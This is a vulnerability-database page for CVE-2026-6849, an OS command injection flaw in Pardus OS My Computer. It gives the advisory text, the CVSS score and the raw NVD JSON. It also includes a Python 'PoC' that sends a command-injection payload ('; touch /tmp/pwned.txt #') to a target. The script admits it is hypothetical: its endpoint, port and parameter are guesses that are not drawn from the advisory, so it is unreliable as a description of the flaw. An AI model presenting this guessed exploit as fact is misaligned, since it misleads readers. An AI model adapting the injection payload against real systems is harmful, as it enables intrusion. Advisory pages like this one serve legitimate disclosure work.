CVE-2026-6849

Description

Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection. This issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Pardus OS My Computer <= 0.7.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-6849 (Hypothetical)
# This script demonstrates how a malicious payload could be sent to trigger the OS command injection.

import requests

def exploit(target_ip):
    # The vulnerable endpoint might be part of the My Computer app service
    url = f"http://{target_ip}:8080/api/v1/system_info"
    
    # Payload designed to inject a command (e.g., creating a file)
    # Assuming the vulnerable parameter is 'path'
    # The semicolon (;) separates commands in Linux shell
    payload = "/valid/path; touch /tmp/pwned.txt #"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
        "Content-Type": "application/json"
    }
    
    data = {
        "path": payload
    }
    
    try:
        response = requests.post(url, json=data, headers=headers, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check if /tmp/pwned.txt exists on the target machine.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6849
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6849
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6849/
[4] VulDB https://vuldb.com/cve/CVE-2026-6849
[5] https://www.usom.gov.tr/bildirim/tr-26-0131

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6849", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:28.413", "lastModified": "2026-04-29T21:13:30.563", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus OS My Computer allows OS Command Injection.\n\nThis issue affects Pardus OS My Computer: from <=0.7.5 before 0.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0131", "source": "[email protected]"}]}}